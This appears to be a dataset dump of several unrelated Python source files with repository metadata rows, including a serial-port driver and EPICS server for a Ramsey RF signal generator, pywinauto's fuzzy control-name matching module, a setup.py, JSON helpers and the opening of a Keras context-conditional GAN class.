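# matching operator from self.operation element-wise over memoryview slices.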
class Unit(object):
    def __init__(self):
        self.lram = Lram()
        self.pram = Pram()


class Ctrl(list):
    def __init__(self, units):
        self.units = units

    def wait(self):
        if len(self) == 0:
            return []
        number = self.pop(0)
        unit = self.units[number]
        unit.pram.run(unit.lram)
        return [number]


class Device(object):
    def __init__(self, units):
        self.units = [Unit() for _ in range(units)]
        self.ctrl = Ctrl(self.units)
| 33.2 | 123 | 0.561631 | 2,084 | 0.965709 | 0 | 0 | 0 | 0 | 0 | 0 | 360 | 0.166821 |
cde0f842eb62a19de3f38d4d8d1f8ff65a2ce325 | 10,538 | py | Python | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | ["MIT"] | null | null | null | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | ["MIT"] | 1 | 2019-10-22T21:28:31.000Z | 2019-10-22T21:39:12.000Z | Ramsey_RF_generator.py | bopopescu/Lauecollect | 60ae2b05ea8596ba0decf426e37aeaca0bc8b6be | ["MIT"] | 2 | 2019-06-06T15:06:46.000Z | 2020-07-20T02:03:22.000Z |
"""
Ramsey RSG1000B RF Signal Generator, controlled via RS-232 interface
See: Ramsey RSG1000B RF Signal Generator User Guide, p.10-11
Settings: 9600 baud, 8 bits, parity none, stop bits 1, flow control none
DB09 connector pin 2 = TxD, 3 = RxD, 5 = Ground
The controller accepts unterminated ASCII text commands and generates newline-
terminated ASCII text replies.
Commands:
{255 - Initiate communication by addressing device number 255 (default device
number). Reply "\r\n". (Before that command, all commands will be ignored.)
GO - Get " RF ON\r\n" or " RF OFF\r\n"
O - Toggle RF on/off, reply: " "
Cabling:
"Pico8" iMac -> Prolific USB-Serial 2303 cable -> DB-9 female gender changer ->
Ramsey RSG1000B RF Signal Generator, DB-9 male serial port
Authors: Friedrich Schotte
Date created: 2018-01-22
Date last modified: 2018-01-23
"""
from logging import error,warn,info,debug

__version__ = "1.0"


class RamseyRFDriver(object):
    """Ramsey RSG1000B RF Signal Generator"""
    name = "Ramsey_RF"
    timeout = 1.0
    baudrate = 9600
    id_query = "{255"
    id_reply = "\r\n"
    id_reply_length = 2
    wait_time = 0  # between commands
    last_reply_time = 0.0

    def id_reply_valid(self,reply):
        valid = (reply == self.id_reply)
        debug("Reply %r valid? %r" % (reply,valid))
        return valid

    # Make multithread safe
    from thread import allocate_lock
    __lock__ = allocate_lock()

    port = None

    @property
    def port_name(self):
        """Serial port name"""
        if self.port is None: value = ""
        else: value = self.port.name
        return value
    COMM = port_name

    @property
    def connected(self): return self.port is not None

    @property
    def online(self):
        if self.port is None: self.init_communications()
        online = self.port is not None
        if online: debug("Device online")
        else: warn("Device offline")
        return online

    def query(self,command,count=None):
        """Send a command to the controller and return the reply"""
        with self.__lock__:  # multithread safe
            for i in range(0,2):
                try: reply = self.__query__(command,count=count)
                except Exception,msg:
                    warn("query: %r: attempt %s/2: %s" % (command,i+1,msg))
                    reply = ""
                if reply: return reply
                self.init_communications()
            return reply

    def __query__(self,command,count=None):
        """Send a command to the controller and return the reply"""
        from time import time
        from sleep import sleep
        sleep(self.last_reply_time + self.wait_time - time())
        self.write(command)
        reply = self.read(count=count)
        self.last_reply_time = time()
        return reply

    def write(self,command):
        """Send a command to the controller"""
        if self.port is not None:
            self.port.write(command)
            debug("%s: Sent %r" % (self.port.name,command))

    def read(self,count=None,port=None):
        """Read a reply from the controller,
        count: for non-terminated replies: number of bytes expected
        If count is None, a newline or carriage return is expected to
        terminate the reply"""
        ##debug("read count=%r,port=%r" % (count,port))
        if port is None: port = self.port
        if port is not None:
            port.timeout = self.timeout
            if count:
                #print("in wait:" + str(self.port.inWaiting()))
                debug("Trying to read %r bytes from %s..." % (count,port.name))
                reply = port.read(count)
            else:
                debug("Expecting newline terminated reply from %s..." % (port.name))
                reply = port.readline()
            debug("%s: Read %r" % (port.name,reply))
        else: reply = ""
        return reply

    def init_communications(self):
        """To do before communicating with the controller"""
        from os.path import exists
        from serial import Serial

        if self.port is not None:
            try:
                info("Checking whether device is still responsive...")
                self.port.write(self.id_query)
                debug("%s: Sent %r" % (self.port.name,self.id_query))
                reply = self.read(count=self.id_reply_length)
                if not self.id_reply_valid(reply):
                    debug("%s: %r: invalid reply %r" % (self.port.name,self.id_query,reply))
                    info("%s: lost connection" % self.port.name)
                    self.port = None
                else: info("Device is still responsive.")
            except Exception,msg:
                debug("%s: %s" % (Exception,msg))
                self.port = None
        if self.port is None:
            port_basenames = ["COM"] if not exists("/dev") \
                else ["/dev/tty.usbserial","/dev/ttyUSB"]
            for i in range(-1,50):
                for port_basename in port_basenames:
                    port_name = port_basename+("%d" % i if i>=0 else "")
                    ##debug("Trying port %s..." % port_name)
                    try:
                        port = Serial(port_name,baudrate=self.baudrate)
                        port.write(self.id_query)
                        debug("%s: Sent %r" % (port.name,self.id_query))
                        reply = self.read(count=self.id_reply_length,port=port)
                        if self.id_reply_valid(reply):
                            self.port = port
                            info("Discovered device at %s based on reply %r" % (self.port.name,reply))
                            break
                    except Exception,msg: debug("%s: %s" % (Exception,msg))
                if self.port is not None: break

    def get_RF_on(self):
        """Is radiofrequency output enabled?"""
        debug("Reading radiofrequency output state")
        reply = self.query("GO")  # ' RF OFF\r\n'
        value = "RF ON" in reply
        if not "RF " in reply:
            warn("Radiofrequency output state is unreadable")
            from numpy import nan
            value = nan
        return value

    def set_RF_on(self,value):
        if value != self.RF_on: self.query("O",count=1)
    RF_on = property(get_RF_on,set_RF_on)
    VAL = RF_on


Ramsey_RF_driver = RamseyRFDriver()
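
# Illustrative use of the driver above (not part of the original module;
# assumes the generator is actually connected):
#
#     Ramsey_RF_driver.init_communications()  # autodetects the serial port via "{255"
#     print(Ramsey_RF_driver.RF_on)           # sends "GO" and parses " RF ON/OFF"
#     Ramsey_RF_driver.RF_on = True           # sends "O" to toggle the output if needed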
class RamseyRF_IOC(object):
    name = "Ramsey_RF_IOC"
    from persistent_property import persistent_property
    prefix = persistent_property("prefix","NIH:RF")
    SCAN = persistent_property("SCAN",1.0)
    running = False

    def get_EPICS_enabled(self):
        return self.running
    def set_EPICS_enabled(self,value):
        from thread import start_new_thread
        if value:
            if not self.running: start_new_thread(self.run,())
        else: self.running = False
    EPICS_enabled = property(get_EPICS_enabled,set_EPICS_enabled)

    def run(self):
        """Run EPICS IOC"""
        from CAServer import casput,casmonitor,casdel
        from numpy import isfinite,nan
        from time import time
        from sleep import sleep
        self.running = True
        casput(self.prefix+".SCAN",self.SCAN)
        casput(self.prefix+".DESC","State")
        casput(self.prefix+".EGU","")
        # Monitor client-writable PVs.
        casmonitor(self.prefix+".SCAN",callback=self.monitor)
        casmonitor(self.prefix+".VAL",callback=self.monitor)
        was_online = False
        while self.running:
            if self.SCAN > 0 and isfinite(self.SCAN):
                SCAN = self.SCAN
                online = Ramsey_RF_driver.online
                if online:
                    if online and not was_online:
                        info("Reading configuration...")
                        casput(self.prefix+".COMM",Ramsey_RF_driver.COMM)
                        casput(self.prefix+".SCANT",nan)
                    t = time()
                    casput(self.prefix+".VAL",float(Ramsey_RF_driver.VAL))
                    sleep(t+1.0*SCAN-time())
                    casput(self.prefix+".SCANT",time()-t)  # post actual scan time for diagnostics
                else:
                    casput(self.prefix+".VAL",nan)
                    sleep(SCAN)
                was_online = online
            else:
                casput(self.prefix+".SCANT",nan)
                sleep(0.1)
        casdel(self.prefix)

    def monitor(self,PV_name,value,char_value):
        """Process PV change requests"""
        from CAServer import casput
        info("%s = %r" % (PV_name,value))
        if PV_name == self.prefix+".SCAN":
            self.SCAN = float(value)
            casput(self.prefix+".SCAN",self.SCAN)
        if PV_name == self.prefix+".VAL":
            Ramsey_RF_driver.VAL = float(value)
            casput(self.prefix+".VAL",float(Ramsey_RF_driver.VAL))


Ramsey_RF_IOC = RamseyRF_IOC()


def run_IOC():
    """Serve the Ensemble IPAQ up on the network as EPICS IOC"""
    import logging
    from tempfile import gettempdir
    logfile = gettempdir()+"/Ramsey_RF.log"
    logging.basicConfig(level=logging.DEBUG,
        format="%(asctime)s %(levelname)s: %(message)s",
        filename=logfile,
    )
    Ramsey_RF_IOC.run()


def alias(name):
    """Make property given by name be known under a different name"""
    def get(self): return getattr(self,name)
    def set(self,value): setattr(self,name,value)
    return property(get,set)
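
# For example (illustrative): ``port_name = alias("COMM")`` in the class below
# makes ``obj.port_name`` read and write ``obj.COMM``.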
from EPICS_motor import EPICS_motor

class RamseyRF(EPICS_motor):
    """Ramsey RF signal generator"""
    command_value = alias("VAL")  # EPICS_motor.command_value not changeable
    port_name = alias("COMM")
    prefix = alias("__prefix__")  # EPICS_motor.prefix not changeable
    RF_on = alias("VAL")  # for backward compatibility

Ramsey_RF_generator = RamseyRF(prefix="NIH:RF",name="Ramsey_RF")


def binstr(n):
    """binary number representation of n"""
    s = ""
    for i in range(31,-1,-1):
        if (n >> i) & 1: s += "1"
        elif s != "": s += "0"
    return s


if __name__ == "__main__":  # for testing
    from sys import argv
    if "run_IOC" in argv: run_IOC()
    from pdb import pm
    import logging
    logging.basicConfig(level=logging.DEBUG,
        format="%(asctime)s %(levelname)s: %(message)s")
    self = Ramsey_RF_driver  # for debugging
    print('Ramsey_RF_driver.init_communications()')
    print("Ramsey_RF_driver.port_name")
    print("Ramsey_RF_driver.RF_on")
    print("Ramsey_RF_IOC.run()")
    print("run_IOC()")
| 36.089041 | 101 | 0.584836 | 8,235 | 0.781458 | 0 | 0 | 455 | 0.043177 | 0 | 0 | 3,085 | 0.29275 |
cde603f7c8844ec9a35ff25bb6a1c13b5f4bbf79 | 819 | py | Python | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | ["MIT"] | null | null | null | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | ["MIT"] | null | null | null | modules/file_helper.py | dada00321/ntust_moodle_resource_crawler | cc5d424ab9440d8e67bb072977fc58740d8bc968 | ["MIT"] | null | null | null |
import json
def save_json(dict_, json_filepath):
    ''' [Example] Write JSON '''
    '''
    dict_ = {"0":{"title":"test-A", "is-available": False, "link":"https://www.AAA.XXX..."},
             "1":{"title":"test-B", "is-available": True, "link":"https://www.BBB.XXX..."}}
    with open("dict_.txt", 'w') as output_file:
        json.dump(dict_, output_file)
    '''
    with open(json_filepath, 'w') as output_file:
        json.dump(dict_, output_file)
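
# Illustrative round trip using the two helpers (not part of the original
# module; load_json is defined just below):
#
#     save_json({"a": 1}, "tmp.json")
#     assert load_json("tmp.json") == {"a": 1}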
def load_json(json_filepath):
    ''' [Example] Read JSON '''
    '''
    with open("dict_.txt", 'r') as json_file:
        dict_ = json.load(json_file)
    print(dict_)
    print(type(dict_))
    '''
    with open(json_filepath, 'r') as json_file:
        dict_ = json.load(json_file)
    #print(dict_)
    #print(type(dict_))
    return dict_
| 31.5 | 92 | 0.570208 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 517 | 0.631258 |
cde6ca9c0b5b99aea51fe8a0efe3ed98163008e0 | 17,570 | py | Python | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | ["MIT", "Unlicense"] | 191 | 2015-01-02T12:17:07.000Z | 2021-05-26T09:26:05.000Z | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | ["MIT", "Unlicense"] | 48 | 2015-01-14T00:57:36.000Z | 2021-04-06T21:45:42.000Z | win/pywinauto/findbestmatch.py | sk8darr/BrowserRefresh-Sublime | daee0eda6480c07f8636ed24e5c555d24e088886 | ["MIT", "Unlicense"] | 36 | 2015-01-14T18:54:25.000Z | 2021-07-18T10:54:42.000Z |
# GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA

"Module to find the closest match of a string in a list"

__revision__ = "$Revision: 679 $"

import re
import difflib

from . import fuzzydict
#import ctypes
#import ldistance
#levenshtein_distance = ctypes.cdll.levenshtein.levenshtein_distance
#levenshtein_distance = ldistance.distance

# need to use sets.Set for python 2.3 compatibility
# but 2.6 raises a deprecation warning about sets module
try:
    set
except NameError:
    import sets
    set = sets.Set

find_best_control_match_cutoff = .6

#====================================================================
class MatchError(IndexError):
    "A suitable match could not be found"
    def __init__(self, items = None, tofind = ''):
        "Init the parent with the message"
        self.tofind = tofind
        self.items = items
        if self.items is None:
            self.items = []

        IndexError.__init__(self,
            "Could not find '%s' in '%s'"% (tofind, self.items))


_cache = {}

# given a list of texts return the match score for each
# and the best score and text with best score
#====================================================================
def _get_match_ratios(texts, match_against):
    "Get the match ratio of how each item in texts compares to match_against"
    # now time to figure out the matching
    ratio_calc = difflib.SequenceMatcher()
    ratio_calc.set_seq1(match_against)

    ratios = {}
    best_ratio = 0
    best_text = ''

    global cache

    for text in texts:
        if 0:
            pass
        if (text, match_against) in _cache:
            ratios[text] = _cache[(text, match_against)]
        elif(match_against, text) in _cache:
            ratios[text] = _cache[(match_against, text)]
        else:
            # set up the SequenceMatcher with other text
            ratio_calc.set_seq2(text)

            # try using the levenshtein distance instead
            #lev_dist = levenshtein_distance(unicode(match_against), unicode(text))
            #ratio = 1 - lev_dist / 10.0
            #ratios[text] = ratio

            # calculate ratio and store it
            ratios[text] = ratio_calc.ratio()
            _cache[(match_against, text)] = ratios[text]

        # if this is the best so far then update best stats
        if ratios[text] > best_ratio:
            best_ratio = ratios[text]
            best_text = text

    return ratios, best_ratio, best_text

#====================================================================
def find_best_match(search_text, item_texts, items, limit_ratio = .5):
    """Return the item that best matches the search_text

    * **search_text** The text to search for
    * **item_texts** The list of texts to search through
    * **items** The list of items corresponding (1 to 1)
      to the list of texts to search through.
    * **limit_ratio** How well the text has to match the best match.
      If the best match matches lower than this then it is not
      considered a match and a MatchError is raised, (default = .5)
    """
    search_text = _cut_at_tab(search_text)

    text_item_map = UniqueDict()
    # Clean each item, make it unique and map it
    # to the item index
    for text, item in zip(item_texts, items):
        text_item_map[_cut_at_tab(text)] = item

    ratios, best_ratio, best_text = \
        _get_match_ratios(list(text_item_map.keys()), search_text)

    if best_ratio < limit_ratio:
        raise MatchError(items = list(text_item_map.keys()), tofind = search_text)

    return text_item_map[best_text]
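
# Illustrative call (not part of the original module; btn1..btn3 are
# hypothetical control objects):
#
#     find_best_match("Cancel", ["Cancel", "Apply", "Help"], [btn1, btn2, btn3])
#
# returns btn1, since "Cancel" matches its own text with ratio 1.0, which is
# above the default limit_ratio of .5.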
#====================================================================
_after_tab = re.compile(r"\t.*", re.UNICODE)
_non_word_chars = re.compile(r"\W", re.UNICODE)

def _cut_at_tab(text):
    "Cut the string at the first tab and return it"
    # remove anything after the first tab
    return _after_tab.sub("", text)

def _clean_non_chars(text):
    "Remove non word characters"
    # should this also remove everything after the first tab?
    # remove non alphanumeric characters
    return _non_word_chars.sub("", text)

def IsAboveOrToLeft(ref_control, other_ctrl):
    "Return true if the other_ctrl is above or to the left of ref_control"
    text_r = other_ctrl.Rectangle()
    ctrl_r = ref_control.Rectangle()

    # skip controls where text win is to the right of ctrl
    if text_r.left >= ctrl_r.right:
        return False

    # skip controls where text win is below ctrl
    if text_r.top >= ctrl_r.bottom:
        return False

    # text control top left corner is below control
    # top left corner - so not above or to the left :)
    if text_r.top >= ctrl_r.top and text_r.left >= ctrl_r.left:
        return False

    return True

#====================================================================
distance_cuttoff = 999
def GetNonTextControlName(ctrl, controls):
    """Return the name for this control by finding the closest
    text control above and to its left"""
    names = []

    ctrl_index = controls.index(ctrl)

    if ctrl_index != 0:
        prev_ctrl = controls[ctrl_index-1]

        if prev_ctrl.FriendlyClassName() == "Static" and \
            prev_ctrl.IsVisible() and prev_ctrl.WindowText() and \
            IsAboveOrToLeft(ctrl, prev_ctrl):

            names.append(
                prev_ctrl.WindowText() +
                ctrl.FriendlyClassName())

    # get the visible text controls so that we can get
    # the closest text if the control has no text
    text_ctrls = [ctrl_ for ctrl_ in controls
        if ctrl_.IsVisible() and ctrl_.WindowText() and ctrl_.can_be_label]

    best_name = ''
    closest = distance_cuttoff

    # now for each of the visible text controls
    for text_ctrl in text_ctrls:
        # get aliases to the control rectangles
        text_r = text_ctrl.Rectangle()
        ctrl_r = ctrl.Rectangle()

        # skip controls where text win is to the right of ctrl
        if text_r.left >= ctrl_r.right:
            continue

        # skip controls where text win is below ctrl
        if text_r.top >= ctrl_r.bottom:
            continue

        # calculate the distance between the controls
        # at first I just calculated the distance from the top left
        # corner of one control to the top left corner of the other control
        # but this was not best, so as a text control should either be above
        # or to the left of the control I get the distance between
        # the top left of the non text control against the
        #    Top-Right of the text control (text control to the left)
        #    Bottom-Left of the text control (text control above)
        # then I get the min of these two

        # We do not actually need to calculate the difference here as we
        # only need a comparative number. As long as we find the closest one
        # the actual distance is not all that important to us.
        # this reduced the unit tests run on my machine by about 1 second
        # (from 61 -> 60 s)

        # (x^2 + y^2)^.5
        #distance = (
        #    (text_r.left - ctrl_r.left) ** 2 +  # (x^2 + y^2)
        #    (text_r.bottom - ctrl_r.top) ** 2) \
        #    ** .5  # ^.5
        #distance2 = (
        #    (text_r.right - ctrl_r.left) ** 2 +  # (x^2 + y^2)
        #    (text_r.top - ctrl_r.top) ** 2) \
        #    ** .5  # ^.5

        distance = abs(text_r.left - ctrl_r.left) + abs(text_r.bottom - ctrl_r.top)
        distance2 = abs(text_r.right - ctrl_r.left) + abs(text_r.top - ctrl_r.top)
        distance = min(distance, distance2)

        # if this distance was closer than the last one
        if distance < closest:
            closest = distance
            best_name = text_ctrl.WindowText() + ctrl.FriendlyClassName()

    names.append(best_name)
    return names
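
# Worked example of the distance heuristic above (illustrative): for a label
# with Rectangle (left=10, top=5, right=60, bottom=20) and a control at
# (left=70, top=5, ...):
#
#     distance  = |10 - 70| + |20 - 5| = 75   # "label above" measure
#     distance2 = |60 - 70| + |5 - 5|  = 10   # "label to the left" measure
#
# min(75, 10) = 10, so this label competes as a close "to the left" neighbour.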
#====================================================================
def get_control_names(control, allcontrols):
    "Returns a list of names for this control"
    names = []

    # if it has a reference control - then use that
    #if hasattr(control, 'ref') and control.ref:
    #    control = control.ref

    # Add the control based on its friendly class name
    names.append(control.FriendlyClassName())

    # if it has some character text then add it based on that
    # and based on that with friendly class name appended
    cleaned = control.WindowText()
    # Todo - I don't like the hardcoded classnames here!
    if cleaned and control.has_title:
        names.append(cleaned)
        names.append(cleaned + control.FriendlyClassName())

    # it didn't have visible text
    else:
        # so find the text of the nearest visible text control
        non_text_names = GetNonTextControlName(control, allcontrols)
        # and if one was found - add it
        if non_text_names:
            names.extend(non_text_names)

    # return the names - and make sure there are no duplicates
    return set(names)

#====================================================================
class UniqueDict(dict):
    "A dictionary subclass that handles making its keys unique"
    def __setitem__(self, text, item):
        "Set an item of the dictionary"

        # this text is already in the map
        # so we need to make it unique
        if text in self:
            # find next unique text after text1
            unique_text = text
            counter = 2
            while unique_text in self:
                unique_text = text + str(counter)
                counter += 1

            # now we also need to make sure the original item
            # is under text0 and text1 also!
            if text + '0' not in self:
                dict.__setitem__(self, text+'0', self[text])
                dict.__setitem__(self, text+'1', self[text])

            # now that we don't need the original 'text' anymore
            # replace it with the unique text
            text = unique_text

        # add our current item
        dict.__setitem__(self, text, item)
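
    # Illustrative behaviour (not part of the original class), traced from the
    # code above: after inserting the key "OK" twice,
    #
    #     d = UniqueDict(); d["OK"] = a; d["OK"] = b
    #
    # the first item stays reachable as "OK", "OK0" and "OK1", while the
    # second item becomes "OK2".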
    def FindBestMatches(
        self,
        search_text,
        clean = False,
        ignore_case = False):
        """Return the best matches for search_text in the items

        * **search_text** the text to look for
        * **clean** whether to clean non text characters out of the strings
        * **ignore_case** compare strings case insensitively
        """
        # now time to figure out the matching
        ratio_calc = difflib.SequenceMatcher()

        if ignore_case:
            search_text = search_text.lower()

        ratio_calc.set_seq1(search_text)

        ratios = {}
        best_ratio = 0
        best_texts = []

        ratio_offset = 1
        if clean:
            ratio_offset *= .9
        if ignore_case:
            ratio_offset *= .9

        for text_ in self:
            # make a copy of the text as we need the original later
            text = text_

            if clean:
                text = _clean_non_chars(text)
            if ignore_case:
                text = text.lower()

            # check if this item is in the cache - if yes, then retrieve it
            if (text, search_text) in _cache:
                ratios[text_] = _cache[(text, search_text)]
            elif(search_text, text) in _cache:
                ratios[text_] = _cache[(search_text, text)]
            # not in the cache - calculate it and add it to the cache
            else:
                # set up the SequenceMatcher with other text
                ratio_calc.set_seq2(text)

                # if a very quick check reveals that this is not going
                # to match then
                ratio = ratio_calc.real_quick_ratio() * ratio_offset

                if ratio >= find_best_control_match_cutoff:
                    ratio = ratio_calc.quick_ratio() * ratio_offset

                    if ratio >= find_best_control_match_cutoff:
                        ratio = ratio_calc.ratio() * ratio_offset

                # save the match we got and store it in the cache
                ratios[text_] = ratio
                _cache[(text, search_text)] = ratio

                # try using the levenshtein distance instead
                #lev_dist = levenshtein_distance(unicode(search_text), unicode(text))
                #ratio = 1 - lev_dist / 10.0
                #ratios[text_] = ratio
                #print "%5s" %("%0.2f"% ratio), search_text, `text`

            # if this is the best so far then update best stats
            if ratios[text_] > best_ratio and \
                ratios[text_] >= find_best_control_match_cutoff:
                best_ratio = ratios[text_]
                best_texts = [text_]

            elif ratios[text_] == best_ratio:
                best_texts.append(text_)

        #best_ratio *= ratio_offset

        return best_ratio, best_texts

#====================================================================
def build_unique_dict(controls):
    """Build the disambiguated list of controls

    Separated out to a different function so that we can get
    the control identifiers for printing.
    """
    name_control_map = UniqueDict()

    # collect all the possible names for all controls
    # and build a list of them
    for ctrl in controls:
        ctrl_names = get_control_names(ctrl, controls)

        # for each of the names
        for name in ctrl_names:
            name_control_map[name] = ctrl

    return name_control_map

#====================================================================
def find_best_control_matches(search_text, controls):
    """Returns the control that is the best match to search_text

    This is slightly different from find_best_match in that it builds
    up the list of text items to search through using information
    from each control. So for example if there is an OK Button
    then the following are all added to the search list:
    "OK", "Button", "OKButton"

    But if there is a ListView (which do not have visible 'text')
    then it will just add "ListView".
    """
    name_control_map = build_unique_dict(controls)

    #    # collect all the possible names for all controls
    #    # and build a list of them
    #    for ctrl in controls:
    #        ctrl_names = get_control_names(ctrl, controls)
    #
    #        # for each of the names
    #        for name in ctrl_names:
    #            name_control_map[name] = ctrl

    search_text = str(search_text)

    best_ratio, best_texts = name_control_map.FindBestMatches(search_text)

    best_ratio_ci, best_texts_ci = \
        name_control_map.FindBestMatches(search_text, ignore_case = True)

    best_ratio_clean, best_texts_clean = \
        name_control_map.FindBestMatches(search_text, clean = True)

    best_ratio_clean_ci, best_texts_clean_ci = \
        name_control_map.FindBestMatches(
            search_text, clean = True, ignore_case = True)

    if best_ratio_ci > best_ratio:
        best_ratio = best_ratio_ci
        best_texts = best_texts_ci

    if best_ratio_clean > best_ratio:
        best_ratio = best_ratio_clean
        best_texts = best_texts_clean

    if best_ratio_clean_ci > best_ratio:
        best_ratio = best_ratio_clean_ci
        best_texts = best_texts_clean_ci

    if best_ratio < find_best_control_match_cutoff:
        raise MatchError(items = list(name_control_map.keys()), tofind = search_text)

    return [name_control_map[best_text] for best_text in best_texts]

#
#def GetControlMatchRatio(text, ctrl):
#    # get the texts for the control
#    ctrl_names = get_control_names(ctrl)
#
#    # get the best match for these
#    matcher = UniqueDict()
#    for name in ctrl_names:
#        matcher[name] = ctrl
#
#    best_ratio, unused = matcher.FindBestMatches(text)
#
#    return best_ratio
#
#
#
#def get_controls_ratios(search_text, controls):
#    name_control_map = UniqueDict()
#
#    # collect all the possible names for all controls
#    # and build a list of them
#    for ctrl in controls:
#        ctrl_names = get_control_names(ctrl)
#
#        # for each of the names
#        for name in ctrl_names:
#            name_control_map[name] = ctrl
#
#    match_ratios, best_ratio, best_text = \
#        _get_match_ratios(name_control_map.keys(), search_text)
#
#    return match_ratios, best_ratio, best_text,
| 32.657993 | 86 | 0.594878 | 4,299 | 0.244678 | 0 | 0 | 0 | 0 | 0 | 0 | 8,676 | 0.493796 |
cde9443d5f9dce44149feca0d10e665a2fbcf090 | 1,074 | py | Python | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | ["MIT"] | 11 | 2018-07-09T07:08:16.000Z | 2018-07-13T14:05:46.000Z | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | ["MIT"] | 3 | 2020-03-24T17:37:47.000Z | 2021-02-02T22:18:59.000Z | setup.py | boichee/fabricator | 33ad4fa615c153817b014d6b7fe9807f1752db25 | ["MIT"] | null | null | null |
from setuptools import setup, find_packages
exclude_dirs = ['ez_setup', 'examples', 'tests', 'venv']

# Runtime requirements
reqs = [
    'requests',
    'six',
    'future',
    'aenum'
]

# Requirements for testing
test_reqs = ['pytest', 'hypothesis', 'requests_mock']

# Requirements for setup
setup_reqs = ['flake8', 'pep8', 'pytest-runner']

setup(
    name='fabricate-it',
    version='1.1.0',
    author='Brett Levenson',
    author_email='[email protected]',
    description='A library that makes creating API clients simple and declarative',
    url='https://github.com/boichee/fabricator',
    packages=find_packages(exclude=exclude_dirs),
    install_requires=reqs,
    tests_require=test_reqs,
    setup_requires=setup_reqs,
    classifiers=[
        'Development Status :: 4 - Beta',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: POSIX',
        'Topic :: Software Development',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.6',
        'Intended Audience :: Developers'
    ]
)
| 26.85 | 83 | 0.650838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 601 | 0.55959 |
cde9a03010ce87292ba1da645b7d397d96cc724e | 115 | py | Python | aitoolbox/cloud/__init__.py | mv1388/AIToolbox | c64ac4810a02d230ce471d86b758e82ea232a7e7 | ["MIT"] | 3 | 2019-10-12T12:24:09.000Z | 2020-08-02T02:42:43.000Z | aitoolbox/cloud/__init__.py | mv1388/aitoolbox | 1060435e6cbdfd19abcb726c4080b663536b7467 | ["MIT"] | 3 | 2020-04-10T14:07:07.000Z | 2020-04-22T19:04:38.000Z | aitoolbox/cloud/__init__.py | mv1388/aitoolbox | 1060435e6cbdfd19abcb726c4080b663536b7467 | ["MIT"] | null | null | null |
s3_available_options = ['s3', 'aws_s3', 'aws']
gcs_available_options = ['gcs', 'google_storage', 'google storage']
| 38.333333 | 67 | 0.713043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.469565 |
cde9dfcf27b3e92945a09440ebd5cd1eb09e8452 | 12,607 | py | Python | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | ["MIT"] | null | null | null | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | ["MIT"] | null | null | null | src/gan/ccgan/ccGAN.py | matkir/Master_programs | 70c4c399f9c9fc3e1643e78694223b24d7b94b18 | ["MIT"] | null | null | null |
from __future__ import print_function, division
if __name__=='__main__':
    from cc_weights import Weight_model
else:
    from . import Weight_model
from keras.models import load_model
import keras.backend as K
import plotload
import sys
from selector import Selector
#from masker import mask_from_template,mask_randomly_square,mask_green_corner,combine_imgs_with_mask
import masker as ms
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import cutter
import masker


class CCgan():
    def __init__(self,img_cols,img_rows):
        """
        Initializes the autoencoder.
        """
        self.set_training_info()
        globals().update(self.info)
        self.threshold=threshold
        self.img_cols = img_cols  # Original is ~576
        self.img_rows = img_rows  # Original is ~720
        self.channels = 3  # RGB
        self.img_shape=(self.img_cols,self.img_rows,self.channels)
        if not mask:
            dummy=plotload.load_polyp_batch(self.img_shape,20,data_type='med/stool-inclusions',crop=False)
            self.dims =cutter.find_square_coords(dummy)
        self.combined=None
        self.discriminator=None
        self.generator=None
        self.pretrained=False

    def load_model(self):
        """
        Loads a model into the object instead of creating one,
        from the .h5 files saved during training.
        """
        if self.combined!=None:
            print("Warning: overriding a loaded model")
        self.generator=load_model(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
        self.discriminator=load_model(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
        self.combined=load_model(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")

    def load_model_weights(self):
        if self.combined==None:
            print("Error: no model in object")
        else:
            try:
                self.combined.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com.h5")
                self.discriminator.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis.h5")
                self.generator.load_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen.h5")
                self.pretrained=True
            except Exception as e:
                print("Error: weights could not be loaded")
                print(e)

    def build_model(self):
        """
        Builds a model for the object instead of loading one.
        Uses cc_weights.py as the model definition.
        """
        if self.combined!=None:
            print("Warning: overriding a loaded model")
        wm=Weight_model(self.img_cols,self.img_rows)
        self.discriminator,self.generator,self.combined=wm.build_model()
